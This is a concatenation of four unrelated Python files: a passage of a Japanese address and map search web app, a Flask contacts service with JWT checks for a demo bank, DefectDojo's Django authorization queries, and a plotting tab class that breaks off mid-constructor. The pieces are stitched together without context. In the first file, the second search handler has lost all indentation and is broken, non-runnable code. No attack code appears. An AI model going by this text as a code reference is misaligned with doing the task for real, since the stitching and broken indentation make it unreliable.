    cur = self.addr_db.cursor()
    s = rmsp(s.decode(self.codec))
    yield Template(u'<h1>「$(s)」の検索結果</h1>', s=s)
    aids = []
    error = None
    for r in search(cur, s):
        if r is None: continue
        if isinstance(r, AddrNotFound):
            # Remember the failure kind but keep collecting other results.
            error = r
            continue
        aids.extend(r)
    if not aids:
        # Pick the error message matching the most specific failure seen.
        if isinstance(error, NoRegion):
            yield Template(u'<p> エラー: 市町村を入力してください。\n')
        elif isinstance(error, NoWord):
            yield Template(u'<p> エラー: 市町村以下の住所を入力してください。\n')
        else:
            yield Template(u'<p> 該当する住所が見つかりませんでした。\n')
    else:
        yield Template(u'<p> $(n)件の住所が見つかりました。\n', n=len(aids))
        yield '<ul>\n'
        for aid in aids:
            cur.execute('SELECT rgncode,name,postal,lat,lng FROM address WHERE aid=?;',
                (aid,))
            for (rgncode,name,postal,lat,lng) in cur:
                yield Template(
                    u'<li> <a href="/search?p=$[lat],$[lng]">'
                    u'〒$(postal) $(region) $(name)</a>\n',
                    postal=(postal[:3]+'-'+postal[3:]),
                    region=get_region_name(rgncode), name=name,
                    lat=str(lat), lng=str(lng))
        yield '</ul>\n'
    yield self.FOOTER
    return
@GET('/search')
def search(self, p, s=u''):
from search_entity import search, getdist
try:
(lat0,_,lng0) = p.partition(',')
lat0 = float(lat0)
lng0 = float(lng0)
loc0 = (lat0, lng0)
except ValueError:
yield InternalError()
return
yield Response()
yield self.HEADER
addr = self.addr_db.cursor()
radius = 0.011
maxresults = 50
R = 0.011
DELTA = 0.005
loc = u'座標 %.3f,%.3f' % (lat0,lng0)
addr.execute('SELECT aid,lat,lng FROM point WHERE '
'?<=lat and ?<=lng and lat<=? and lng<=?;',
(lat0-R,lng0-R, lat0+R,lng0+R))
pts = list(addr)
if pts:
pts.sort(key=lambda (aid,lat1,lng1): getdist(loc0,(lat1,lng1)))
(aid,_,_) = pts[0]
addr.execute('SELECT rgncode,name FROM address WHERE aid=?;', (aid,))
for (rgncode,name) in addr:
loc = u'%s %s付近' % (get_region_name(rgncode), name)
yield Template(u'<h1>$(loc)</h1>\n', loc=loc)
yield Template(
u'<div><form method=GET action="/search">\n'
u'キーワード: '
u'<input name=s size=50 value="$(s)">\n'
u'<input name=p type=hidden value="$(p)">\n'
u'<input name=cmd type=submit value="絞り込み検索">\n'
u'</form></div>\n',
s=s, p=p)
yield Template(
u'<div>'
u'<a href="/">住所入力に戻る</a> \n'
u'<a href="/search?p=$(lat0),$(lnge)">[東へ移動]</a> \n'
u'<a href="/search?p=$(lat0),$(lngw)">[西へ移動]</a> \n'
u'<a href="/search?p=$(lats),$(lng0)">[南へ移動]</a> \n'
u'<a href="/search?p=$(latn),$(lng0)">[北へ移動]</a> \n'
u'</div>',
lat0=lat0, lng0=lng0,
lnge=lng0+DELTA, lngw=lng0-DELTA,
latn=lat0+DELTA, lats=lat0-DELTA)
kwds = []
if s:
s = rmsp(s.decode(self.codec))
if s:
kwds = s.split(' ')
radius *= 5
node = self.osm_db.cursor()
point = self.osm_db.cursor()
entity = self.osm_db.cursor()
objs = list(search(node, point, entity, lat0, lng0, kwds, radius=radius))
if objs:
objs.sort(key=lambda (nid,lat1,lng1,name,props): getdist(loc0,(lat1,lng1)))
if maxresults < len(objs):
yield Template(u'<p> $(n)件中、最初の$(maxresults)件を表示しています。',
n=len(objs), maxresults=maxresults)
objs = objs[:maxresults]
else:
yield Template(u'<p> $(n)件を表示しています。', n=len(objs))
yield '<ul>\n'
for (nid,lat1,lng1,name,props) in objs:
dist = '%.1f' % getdist(loc0,(lat1,lng1))
d = get_dir(lng1-lng0, lat1-lat0)
yield Template(
u'<li> $(name) $(t) $(d)$(dist)km '
u'<a href="?p=$(lat),$(lng)">[ここに移動]</a>\n',
name=name, t=get_type(props), d=d, dist=dist,
lat=lat1, lng=lng1)
yield '</ul>\n'
else:
yield Template(u'<p> 該当する建物・場所が見つかりませんでした。\n')
yield Template(
u'<div><form method=GET action="/search">\n'
u'キーワード: '
u'<input name=s size=50 value="$(s)">\n'
u'<input name=p type=hidden value="$(p)">\n'
u'<input name=cmd type=submit value="絞り込み検索">\n'
u'</form></div>\n',
s=s, p=p)
yield Template(
u'<div>'
u'<a href="/">住所入力に戻る</a> \n'
u'<a href="/search?p=$(lat0),$(lnge)">[東へ移動]</a> \n'
u'<a href="/search?p=$(lat0),$(lngw)">[西へ移動]</a> \n'
u'<a href="/search?p=$(lats),$(lng0)">[南へ移動]</a> \n'
u'<a href="/search?p=$(latn),$(lng0)">[北へ移動]</a> \n'
u'</div>',
lat0=lat0, lng0=lng0,
lnge=lng0+DELTA, lngw=lng0-DELTA,
latn=lat0+DELTA, lats=lat0-DELTA)
yield self.FOOTER
return
# Entry point: run the VMap web application with the command-line arguments.
if __name__ == '__main__': sys.exit(main(VMap(), sys.argv))
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Web service for handling linked user contacts.
Manages internal user contacts and external accounts.
"""
import atexit
import logging
import os
import re
import sys
import jwt
from flask import Flask, jsonify, request
import bleach
from sqlalchemy.exc import OperationalError, SQLAlchemyError
from db import ContactsDb
from opentelemetry import trace
from opentelemetry.sdk.trace.export import BatchExportSpanProcessor
from opentelemetry.sdk.trace import TracerProvider
from opentelemetry.propagators import set_global_textmap
from opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter
from opentelemetry.tools.cloud_trace_propagator import CloudTraceFormatPropagator
from opentelemetry.instrumentation.flask import FlaskInstrumentor
def create_app():
    """Flask application factory to create instances
    of the Contact Service Flask App.

    Returns a configured Flask app exposing /version, /ready and the
    /contacts/<username> GET/POST endpoints.  Reads configuration from the
    environment (VERSION, LOCAL_ROUTING_NUM, PUB_KEY_PATH, ENABLE_TRACING,
    ACCOUNTS_DB_URI) and exits the process if the database is unreachable.
    """
    app = Flask(__name__)

    # Disabling unused-variable for lines with route decorated functions
    # as pylint thinks they are unused
    # pylint: disable=unused-variable
    @app.route("/version", methods=["GET"])
    def version():
        """
        Service version endpoint
        """
        return app.config["VERSION"], 200

    @app.route("/ready", methods=["GET"])
    def ready():
        """Readiness probe."""
        return "ok", 200

    @app.route("/contacts/<username>", methods=["GET"])
    def get_contacts(username):
        """Retrieve the contacts list for the authenticated user.
        This list is used for populating Payment and Deposit fields.

        Return: a list of contacts
        """
        auth_header = request.headers.get("Authorization")
        if auth_header:
            token = auth_header.split(" ")[-1]
        else:
            token = ""
        try:
            # Fix: PyJWT's `algorithms` parameter expects a list of allowed
            # algorithm names; a bare string only worked by accident of
            # substring matching.
            auth_payload = jwt.decode(
                token, key=app.config["PUBLIC_KEY"], algorithms=["RS256"]
            )
            # Users may only read their own contact list.
            if username != auth_payload["user"]:
                raise PermissionError
            contacts_list = contacts_db.get_contacts(username)
            app.logger.debug("Successfully retrieved contacts.")
            return jsonify(contacts_list), 200
        except (PermissionError, jwt.exceptions.InvalidTokenError) as err:
            app.logger.error("Error retrieving contacts list: %s", str(err))
            return "authentication denied", 401
        except SQLAlchemyError as err:
            app.logger.error("Error retrieving contacts list: %s", str(err))
            return "failed to retrieve contacts list", 500

    @app.route("/contacts/<username>", methods=["POST"])
    def add_contact(username):
        """Add a new favorite account to user's contacts list

        Fails if account or routing number are invalid
        or if label is not alphanumeric

        request fields:
        - account_num
        - routing_num
        - label
        - is_external
        """
        auth_header = request.headers.get("Authorization")
        if auth_header:
            token = auth_header.split(" ")[-1]
        else:
            token = ""
        try:
            auth_payload = jwt.decode(
                token, key=app.config["PUBLIC_KEY"], algorithms=["RS256"]
            )
            if username != auth_payload["user"]:
                raise PermissionError
            # Sanitize all string fields against injected markup before
            # validating them.
            req = {
                k: (bleach.clean(v) if isinstance(v, str) else v)
                for k, v in request.get_json().items()
            }
            _validate_new_contact(req)
            _check_contact_allowed(username, auth_payload["acct"], req)
            # Create contact data to be added to the database.
            contact_data = {
                "username": username,
                "label": req["label"],
                "account_num": req["account_num"],
                "routing_num": req["routing_num"],
                "is_external": req["is_external"],
            }
            # Add contact_data to database
            app.logger.debug("Adding new contact to the database.")
            contacts_db.add_contact(contact_data)
            app.logger.info("Successfully added new contact.")
            return jsonify({}), 201
        except (PermissionError, jwt.exceptions.InvalidTokenError) as err:
            app.logger.error("Error adding contact: %s", str(err))
            return "authentication denied", 401
        except UserWarning as warn:
            app.logger.error("Error adding contact: %s", str(warn))
            return str(warn), 400
        except ValueError as err:
            app.logger.error("Error adding contact: %s", str(err))
            return str(err), 409
        except SQLAlchemyError as err:
            app.logger.error("Error adding contact: %s", str(err))
            return "failed to add contact", 500

    def _validate_new_contact(req):
        """Check that this new contact request has valid fields.

        Raises UserWarning describing the first invalid field found.
        """
        app.logger.debug("validating add contact request: %s", str(req))
        # Check if required fields are filled
        fields = ("label", "account_num", "routing_num", "is_external")
        if any(f not in req for f in fields):
            raise UserWarning("missing required field(s)")
        # Validate account number (must be 10 digits)
        if req["account_num"] is None or not re.match(r"\A[0-9]{10}\Z", req["account_num"]):
            raise UserWarning("invalid account number")
        # Validate routing number (must be 9 digits)
        if req["routing_num"] is None or not re.match(r"\A[0-9]{9}\Z", req["routing_num"]):
            raise UserWarning("invalid routing number")
        # Only allow external accounts to deposit
        if (req["is_external"] and req["routing_num"] == app.config["LOCAL_ROUTING"]):
            raise UserWarning("invalid routing number")
        # Validate label
        # Must be >0 and <=30 chars, alphanumeric and spaces, can't start with space
        if req["label"] is None or not re.match(r"^[0-9a-zA-Z][0-9a-zA-Z ]{0,29}$", req["label"]):
            raise UserWarning("invalid account label")

    def _check_contact_allowed(username, accountid, req):
        """Check that this contact is allowed to be created.

        Raises ValueError for self-references and duplicate contacts.
        """
        app.logger.debug("checking that this contact is allowed to be created: %s", str(req))
        # Don't allow self reference
        if (req["account_num"] == accountid and req["routing_num"] == app.config["LOCAL_ROUTING"]):
            raise ValueError("may not add yourself to contacts")
        # Don't allow identical contacts
        for contact in contacts_db.get_contacts(username):
            if (contact["account_num"] == req["account_num"]
                    and contact["routing_num"] == req["routing_num"]):
                raise ValueError("account already exists as a contact")
            if contact["label"] == req["label"]:
                raise ValueError("contact already exists with that label")

    @atexit.register
    def _shutdown():
        """Executed when web app is terminated."""
        app.logger.info("Stopping contacts service.")

    # set up logger: reuse gunicorn's handlers/level when running under it.
    app.logger.handlers = logging.getLogger("gunicorn.error").handlers
    app.logger.setLevel(logging.getLogger("gunicorn.error").level)
    app.logger.info("Starting contacts service.")

    # Set up tracing and export spans to Cloud Trace.
    # NOTE: ENABLE_TRACING must be present in the environment; a missing
    # variable raises KeyError at startup (fail fast on misconfiguration).
    if os.environ['ENABLE_TRACING'] == "true":
        app.logger.info("✅ Tracing enabled.")
        trace.set_tracer_provider(TracerProvider())
        cloud_trace_exporter = CloudTraceSpanExporter()
        trace.get_tracer_provider().add_span_processor(
            BatchExportSpanProcessor(cloud_trace_exporter)
        )
        set_global_textmap(CloudTraceFormatPropagator())
        FlaskInstrumentor().instrument_app(app)
    else:
        app.logger.info("🚫 Tracing disabled.")

    # setup global variables
    app.config["VERSION"] = os.environ.get("VERSION")
    app.config["LOCAL_ROUTING"] = os.environ.get("LOCAL_ROUTING_NUM")
    # Fix: read the JWT public key with a context manager so the file
    # handle is closed deterministically instead of leaking until GC.
    with open(os.environ.get("PUB_KEY_PATH"), "r") as key_file:
        app.config["PUBLIC_KEY"] = key_file.read()

    # Configure database connection
    try:
        contacts_db = ContactsDb(os.environ.get("ACCOUNTS_DB_URI"), app.logger)
    except OperationalError:
        app.logger.critical("database connection failed")
        sys.exit(1)
    return app
if __name__ == "__main__":
    # Create an instance of flask server when called directly
    # (production deployments run the create_app() factory under gunicorn).
    CONTACTS = create_app()
    CONTACTS.run()
|
from crum import get_current_user
from django.db.models import Exists, OuterRef, Q
from dojo.models import Product, Product_Member, Product_Type_Member, App_Analysis, \
DojoMeta, Product_Group, Product_Type_Group, Languages, Engagement_Presets, \
Product_API_Scan_Configuration
from dojo.authorization.authorization import get_roles_for_permission, user_has_global_permission, user_has_permission, \
role_has_permission
from dojo.group.queries import get_authorized_groups
from dojo.authorization.roles_permissions import Permissions
def get_authorized_products(permission, user=None):
    """Return the Products the given user (default: current user) may
    access with `permission`, ordered by name."""
    if user is None:
        user = get_current_user()
    if user is None:
        return Product.objects.none()

    # Superusers and holders of a matching global permission see everything.
    if user.is_superuser or user_has_global_permission(user, permission):
        return Product.objects.all().order_by('name')

    roles = get_roles_for_permission(permission)
    # One correlated EXISTS subquery per way a user can be authorized.
    member_via_product_type = Product_Type_Member.objects.filter(
        product_type=OuterRef('prod_type_id'), user=user, role__in=roles)
    member_via_product = Product_Member.objects.filter(
        product=OuterRef('pk'), user=user, role__in=roles)
    group_via_product_type = Product_Type_Group.objects.filter(
        product_type=OuterRef('prod_type_id'), group__users=user, role__in=roles)
    group_via_product = Product_Group.objects.filter(
        product=OuterRef('pk'), group__users=user, role__in=roles)

    annotated = Product.objects.annotate(
        prod_type__member=Exists(member_via_product_type),
        member=Exists(member_via_product),
        prod_type__authorized_group=Exists(group_via_product_type),
        authorized_group=Exists(group_via_product)).order_by('name')
    # Keep only products where at least one authorization path exists.
    return annotated.filter(
        Q(prod_type__member=True) | Q(member=True) |
        Q(prod_type__authorized_group=True) | Q(authorized_group=True))
def get_authorized_members_for_product(product, permission):
    """Return `product`'s members if the current user holds `permission`
    on it (or is a superuser), otherwise None."""
    user = get_current_user()
    if not (user.is_superuser or user_has_permission(user, product, permission)):
        return None
    return Product_Member.objects.filter(product=product) \
        .order_by('user__first_name', 'user__last_name').select_related('role')
def get_authorized_groups_for_product(product, permission):
    """Return the group assignments on `product` the current user may see,
    or None if the user lacks `permission` on the product."""
    user = get_current_user()
    if not (user.is_superuser or user_has_permission(user, product, permission)):
        return None
    # Restrict to groups the user is allowed to view at all.
    viewable_groups = get_authorized_groups(Permissions.Group_View)
    return Product_Group.objects.filter(
        product=product, group__in=viewable_groups
    ).order_by('group__name').select_related('role')
def get_authorized_product_members(permission):
    """Return all Product_Member records attached to products the current
    user may access with `permission`."""
    user = get_current_user()
    if user is None:
        return Product_Member.objects.none()
    # Superusers and global-permission holders see every membership.
    if user.is_superuser or user_has_global_permission(user, permission):
        return Product_Member.objects.all().select_related('role')
    return Product_Member.objects.filter(
        product__in=get_authorized_products(permission)).select_related('role')
def get_authorized_product_members_for_user(user, permission):
    """Return `user`'s product memberships that the requesting user is
    allowed to see with `permission`."""
    request_user = get_current_user()
    if request_user is None:
        return Product_Member.objects.none()

    memberships = Product_Member.objects.filter(user=user).select_related('role', 'product')
    if request_user.is_superuser:
        return memberships
    # A global role carrying the permission also grants full visibility.
    has_global_role = (
        hasattr(request_user, 'global_role')
        and request_user.global_role.role is not None
        and role_has_permission(request_user.global_role.role.id, permission))
    if has_global_role:
        return memberships
    # Otherwise limit to products the requesting user can access.
    products = get_authorized_products(permission)
    return memberships.filter(product__in=products)
def get_authorized_product_groups(permission):
    """Return all Product_Group records attached to products the current
    user may access with `permission`.

    Consistency fix: like get_authorized_product_members(), short-circuit
    for users holding the permission globally.  The result is equivalent
    (a global holder is authorized for every product via
    get_authorized_products), but this avoids the product__in subquery.
    """
    user = get_current_user()
    if user is None:
        return Product_Group.objects.none()
    if user.is_superuser:
        return Product_Group.objects.all().select_related('role')
    if user_has_global_permission(user, permission):
        return Product_Group.objects.all().select_related('role')
    products = get_authorized_products(permission)
    return Product_Group.objects.filter(product__in=products).select_related('role')
def get_authorized_app_analysis(permission):
    """Return the App_Analysis records whose product the current user may
    access with `permission` (via product / product-type membership or
    group membership), ordered by name."""
    user = get_current_user()

    if user is None:
        return App_Analysis.objects.none()

    if user.is_superuser:
        return App_Analysis.objects.all().order_by('name')

    if user_has_global_permission(user, permission):
        return App_Analysis.objects.all().order_by('name')

    roles = get_roles_for_permission(permission)
    # One correlated EXISTS subquery per authorization path.
    authorized_product_type_roles = Product_Type_Member.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        user=user,
        role__in=roles)
    authorized_product_roles = Product_Member.objects.filter(
        product=OuterRef('product_id'),
        user=user,
        role__in=roles)
    authorized_product_type_groups = Product_Type_Group.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        group__users=user,
        role__in=roles)
    authorized_product_groups = Product_Group.objects.filter(
        product=OuterRef('product_id'),
        group__users=user,
        role__in=roles)
    app_analysis = App_Analysis.objects.annotate(
        product__prod_type__member=Exists(authorized_product_type_roles),
        product__member=Exists(authorized_product_roles),
        product__prod_type__authorized_group=Exists(authorized_product_type_groups),
        product__authorized_group=Exists(authorized_product_groups)).order_by('name')
    # Keep only rows where at least one authorization path exists.
    app_analysis = app_analysis.filter(
        Q(product__prod_type__member=True) | Q(product__member=True) |
        Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True))
    return app_analysis
def get_authorized_dojo_meta(permission):
    """Return DojoMeta records the current user may access with `permission`.

    Metadata can hang off a product, an endpoint or a finding, so a record
    is visible if ANY of the three parent chains grants access (via direct
    product membership, product-type membership, or group membership)."""
    user = get_current_user()

    if user is None:
        return DojoMeta.objects.none()

    if user.is_superuser:
        return DojoMeta.objects.all().order_by('name')

    if user_has_global_permission(user, permission):
        return DojoMeta.objects.all().order_by('name')

    roles = get_roles_for_permission(permission)
    # Authorization paths through the directly attached product ...
    product_authorized_product_type_roles = Product_Type_Member.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        user=user,
        role__in=roles)
    product_authorized_product_roles = Product_Member.objects.filter(
        product=OuterRef('product_id'),
        user=user,
        role__in=roles)
    product_authorized_product_type_groups = Product_Type_Group.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        group__users=user,
        role__in=roles)
    product_authorized_product_groups = Product_Group.objects.filter(
        product=OuterRef('product_id'),
        group__users=user,
        role__in=roles)
    # ... through the endpoint's product ...
    endpoint_authorized_product_type_roles = Product_Type_Member.objects.filter(
        product_type=OuterRef('endpoint__product__prod_type_id'),
        user=user,
        role__in=roles)
    endpoint_authorized_product_roles = Product_Member.objects.filter(
        product=OuterRef('endpoint__product_id'),
        user=user,
        role__in=roles)
    endpoint_authorized_product_type_groups = Product_Type_Group.objects.filter(
        product_type=OuterRef('endpoint__product__prod_type_id'),
        group__users=user,
        role__in=roles)
    endpoint_authorized_product_groups = Product_Group.objects.filter(
        product=OuterRef('endpoint__product_id'),
        group__users=user,
        role__in=roles)
    # ... and through the finding's product.
    finding_authorized_product_type_roles = Product_Type_Member.objects.filter(
        product_type=OuterRef('finding__test__engagement__product__prod_type_id'),
        user=user,
        role__in=roles)
    finding_authorized_product_roles = Product_Member.objects.filter(
        product=OuterRef('finding__test__engagement__product_id'),
        user=user,
        role__in=roles)
    finding_authorized_product_type_groups = Product_Type_Group.objects.filter(
        product_type=OuterRef('finding__test__engagement__product__prod_type_id'),
        group__users=user,
        role__in=roles)
    finding_authorized_product_groups = Product_Group.objects.filter(
        product=OuterRef('finding__test__engagement__product_id'),
        group__users=user,
        role__in=roles)
    dojo_meta = DojoMeta.objects.annotate(
        product__prod_type__member=Exists(product_authorized_product_type_roles),
        product__member=Exists(product_authorized_product_roles),
        product__prod_type__authorized_group=Exists(product_authorized_product_type_groups),
        product__authorized_group=Exists(product_authorized_product_groups),
        endpoint__product__prod_type__member=Exists(endpoint_authorized_product_type_roles),
        endpoint__product__member=Exists(endpoint_authorized_product_roles),
        endpoint__product__prod_type__authorized_group=Exists(endpoint_authorized_product_type_groups),
        endpoint__product__authorized_group=Exists(endpoint_authorized_product_groups),
        finding__test__engagement__product__prod_type__member=Exists(finding_authorized_product_type_roles),
        finding__test__engagement__product__member=Exists(finding_authorized_product_roles),
        finding__test__engagement__product__prod_type__authorized_group=Exists(finding_authorized_product_type_groups),
        finding__test__engagement__product__authorized_group=Exists(finding_authorized_product_groups)
    ).order_by('name')
    # Any one positive annotation is sufficient for visibility.
    dojo_meta = dojo_meta.filter(
        Q(product__prod_type__member=True) |
        Q(product__member=True) |
        Q(product__prod_type__authorized_group=True) |
        Q(product__authorized_group=True) |
        Q(endpoint__product__prod_type__member=True) |
        Q(endpoint__product__member=True) |
        Q(endpoint__product__prod_type__authorized_group=True) |
        Q(endpoint__product__authorized_group=True) |
        Q(finding__test__engagement__product__prod_type__member=True) |
        Q(finding__test__engagement__product__member=True) |
        Q(finding__test__engagement__product__prod_type__authorized_group=True) |
        Q(finding__test__engagement__product__authorized_group=True))
    return dojo_meta
def get_authorized_languages(permission):
    """Return the Languages records whose product the current user may
    access with `permission`, ordered by language."""
    user = get_current_user()

    if user is None:
        return Languages.objects.none()

    if user.is_superuser:
        return Languages.objects.all().order_by('language')

    if user_has_global_permission(user, permission):
        return Languages.objects.all().order_by('language')

    roles = get_roles_for_permission(permission)
    # One correlated EXISTS subquery per authorization path.
    authorized_product_type_roles = Product_Type_Member.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        user=user,
        role__in=roles)
    authorized_product_roles = Product_Member.objects.filter(
        product=OuterRef('product_id'),
        user=user,
        role__in=roles)
    authorized_product_type_groups = Product_Type_Group.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        group__users=user,
        role__in=roles)
    authorized_product_groups = Product_Group.objects.filter(
        product=OuterRef('product_id'),
        group__users=user,
        role__in=roles)
    languages = Languages.objects.annotate(
        product__prod_type__member=Exists(authorized_product_type_roles),
        product__member=Exists(authorized_product_roles),
        product__prod_type__authorized_group=Exists(authorized_product_type_groups),
        product__authorized_group=Exists(authorized_product_groups)).order_by('language')
    # Keep only rows where at least one authorization path exists.
    languages = languages.filter(
        Q(product__prod_type__member=True) | Q(product__member=True) |
        Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True))
    return languages
def get_authorized_engagement_presets(permission):
    """Return the Engagement_Presets whose product the current user may
    access with `permission`, ordered by title."""
    user = get_current_user()

    if user is None:
        return Engagement_Presets.objects.none()

    if user.is_superuser:
        return Engagement_Presets.objects.all().order_by('title')

    if user_has_global_permission(user, permission):
        return Engagement_Presets.objects.all().order_by('title')

    roles = get_roles_for_permission(permission)
    # One correlated EXISTS subquery per authorization path.
    authorized_product_type_roles = Product_Type_Member.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        user=user,
        role__in=roles)
    authorized_product_roles = Product_Member.objects.filter(
        product=OuterRef('product_id'),
        user=user,
        role__in=roles)
    authorized_product_type_groups = Product_Type_Group.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        group__users=user,
        role__in=roles)
    authorized_product_groups = Product_Group.objects.filter(
        product=OuterRef('product_id'),
        group__users=user,
        role__in=roles)
    engagement_presets = Engagement_Presets.objects.annotate(
        product__prod_type__member=Exists(authorized_product_type_roles),
        product__member=Exists(authorized_product_roles),
        product__prod_type__authorized_group=Exists(authorized_product_type_groups),
        product__authorized_group=Exists(authorized_product_groups)).order_by('title')
    # Keep only rows where at least one authorization path exists.
    engagement_presets = engagement_presets.filter(
        Q(product__prod_type__member=True) | Q(product__member=True) |
        Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True))
    return engagement_presets
def get_authorized_product_api_scan_configurations(permission):
    """Return the Product_API_Scan_Configuration records whose product the
    current user may access with `permission` (unordered)."""
    user = get_current_user()

    if user is None:
        return Product_API_Scan_Configuration.objects.none()

    if user.is_superuser:
        return Product_API_Scan_Configuration.objects.all()

    if user_has_global_permission(user, permission):
        return Product_API_Scan_Configuration.objects.all()

    roles = get_roles_for_permission(permission)
    # One correlated EXISTS subquery per authorization path.
    authorized_product_type_roles = Product_Type_Member.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        user=user,
        role__in=roles)
    authorized_product_roles = Product_Member.objects.filter(
        product=OuterRef('product_id'),
        user=user,
        role__in=roles)
    authorized_product_type_groups = Product_Type_Group.objects.filter(
        product_type=OuterRef('product__prod_type_id'),
        group__users=user,
        role__in=roles)
    authorized_product_groups = Product_Group.objects.filter(
        product=OuterRef('product_id'),
        group__users=user,
        role__in=roles)
    product_api_scan_configurations = Product_API_Scan_Configuration.objects.annotate(
        product__prod_type__member=Exists(authorized_product_type_roles),
        product__member=Exists(authorized_product_roles),
        product__prod_type__authorized_group=Exists(authorized_product_type_groups),
        product__authorized_group=Exists(authorized_product_groups))
    # Keep only rows where at least one authorization path exists.
    product_api_scan_configurations = product_api_scan_configurations.filter(
        Q(product__prod_type__member=True) | Q(product__member=True) |
        Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True))
    return product_api_scan_configurations
|
from tkinter import BOTH, Menu
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
from tanager_feeder.plotter.sample import Sample
from tanager_feeder.plotter.plot import Plot
from tanager_feeder.plotter.hemisphere_plotter import HemispherePlotter
from tanager_feeder import utils
class Tab:
# Title override is true if the title of this individual tab is set manually by user.
# If it is False, then the tab and plot title will be a combo of the file title plus the sample that is plotted.
    def __init__(
        self,
        plotter,
        title,
        samples,
        tab_index=None,
        geoms=None,
        original=None,
        x_axis="wavelength",
        y_axis="reflectance",
        xlim=None,
        ylim=None,
        exclude_artifacts=False,
        exclude_specular=False,
        specularity_tolerance=None,
    ):
        """Create a notebook tab plotting *samples*.

        :param plotter: parent plotter owning the ttk notebook, dpi and menus.
        :param title: tab/plot title (may be suffixed to stay unique).
        :param samples: Sample objects to plot.
        :param tab_index: position to insert the tab at; None appends.
        :param geoms: viewing-geometry dict with keys "i", "e", "az".
        :param original: un-normalized samples kept for resetting; None means
            *samples* already are the originals.
        :param x_axis: quantity on the x axis (default "wavelength").
        :param y_axis: quantity on the y axis (default "reflectance").
        :param xlim: optional x-axis limits.
        :param ylim: optional y-axis limits.
        :param exclude_artifacts: whether artifact data is excluded.
        :param exclude_specular: stored flag for specular exclusion.
        :param specularity_tolerance: tolerance used with exclude_specular.
        """
        self.hemisphere_plotter = HemispherePlotter()
        if geoms is None:
            geoms = {"i": [], "e": [], "az": []}
        self.plotter = plotter
        if original is None:  # This is true if we're not normalizing anything.
            # holding on to the original data lets us reset.
            self.original_samples = list(samples)
        else:
            self.original_samples = original
        self.samples = samples
        self.geoms = geoms
        self.notebook_title = None
        self.set_title(
            title, init=True
        )  # set self.notebook title, add to plotter's list of titles, and add e.g. (1) if needed.
        self.x_axis = x_axis
        self.y_axis = y_axis
        self.xlim = xlim
        self.ylim = ylim
        self.zlim = None
        self.exclude_artifacts = exclude_artifacts
        self.exclude_specular = exclude_specular
        self.specularity_tolerance = specularity_tolerance
        self.width = self.plotter.notebook.winfo_width()
        self.height = self.plotter.notebook.winfo_height()
        # If we need a bigger frame to hold a giant long legend, expand.
        self.legend_len = 0
        for sample in self.samples:
            self.legend_len += len(sample.geoms)
        self.legend_height = self.legend_len * 21 + 100  # 21 px per legend entry.
        self.plot_scale = (self.height - 130) / 21
        self.plot_width = self.width / 9  # very vague character approximation of plot width
        # Choose a plain frame when the legend fits, a scrolled frame otherwise.
        if self.height > self.legend_height:
            self.top = utils.NotScrolledFrame(self.plotter.notebook)
            self.oversize_legend = False
        else:
            self.top = utils.VerticalScrolledFrame(self.plotter.controller, self.plotter.notebook)
            self.oversize_legend = True
            # Make the scrolled frame tall enough for the whole legend.
            self.top.min_height = np.max([self.legend_height, self.height - 50])
        self.top.pack()
        # If this is being created from the File -> Plot option, or from right click -> new tab, just put the
        # tab at the end.
        if tab_index is None:
            self.plotter.notebook.add(self.top, text=self.notebook_title + " x")
            self.plotter.notebook.select(self.plotter.notebook.tabs()[-1])
            self.index = self.plotter.notebook.index(self.plotter.notebook.select())
        # If this is being called after the user did Right click -> choose samples to plot, put it at the same
        # index as before.
        else:
            self.plotter.notebook.add(self.top, text=self.notebook_title + " x")
            self.plotter.notebook.insert(tab_index, self.plotter.notebook.tabs()[-1])
            self.plotter.notebook.select(self.plotter.notebook.tabs()[tab_index])
            self.index = tab_index
        # Two figures: the default one shown in the UI, and a copy rendered
        # with matplotlib's "default" (white background) style for saving.
        self.fig = mpl.figure.Figure(
            figsize=(self.width / self.plotter.dpi, self.height / self.plotter.dpi), dpi=self.plotter.dpi
        )
        with plt.style.context(("default")):
            self.white_fig = mpl.figure.Figure(
                figsize=(self.width / self.plotter.dpi, self.height / self.plotter.dpi), dpi=self.plotter.dpi
            )
        self.canvas = FigureCanvasTkAgg(self.fig, master=self.top.interior)
        self.white_canvas = FigureCanvasTkAgg(self.white_fig, master=self.top.interior)
        # Right click opens the context menu; left click dismisses it.
        self.canvas.get_tk_widget().bind("<Button-3>", lambda event: self.open_right_click_menu(event))
        self.canvas.get_tk_widget().bind("<Button-1>", lambda event: self.close_right_click_menu(event))
        self.canvas.get_tk_widget().pack(expand=True, fill=BOTH)
        self.plot = Plot(
            self.plotter,
            self.fig,
            self.white_fig,
            self.samples,
            self.notebook_title,
            self.oversize_legend,
            self.plot_scale,
            self.plot_width,
            x_axis=self.x_axis,
            y_axis=self.y_axis,
            xlim=self.xlim,
            ylim=self.ylim,
            exclude_artifacts=self.exclude_artifacts,
            draw=True,
        )
        # return
        # if draw:
        #     self.canvas.draw()  # sometimes silently crashes.
        #     # Related to thread safety (only crashes for remote plotting, which involves a
        #     # separate thread). To protect against this, draw will be false if this is called from a separate
        #     # thread and the user is asked for input instead.
        # Context-menu contents depend on the plot type: the edit/analysis
        # entries only apply to wavelength-vs-reflectance plots.
        self.popup_menu = Menu(self.top.interior, tearoff=0)
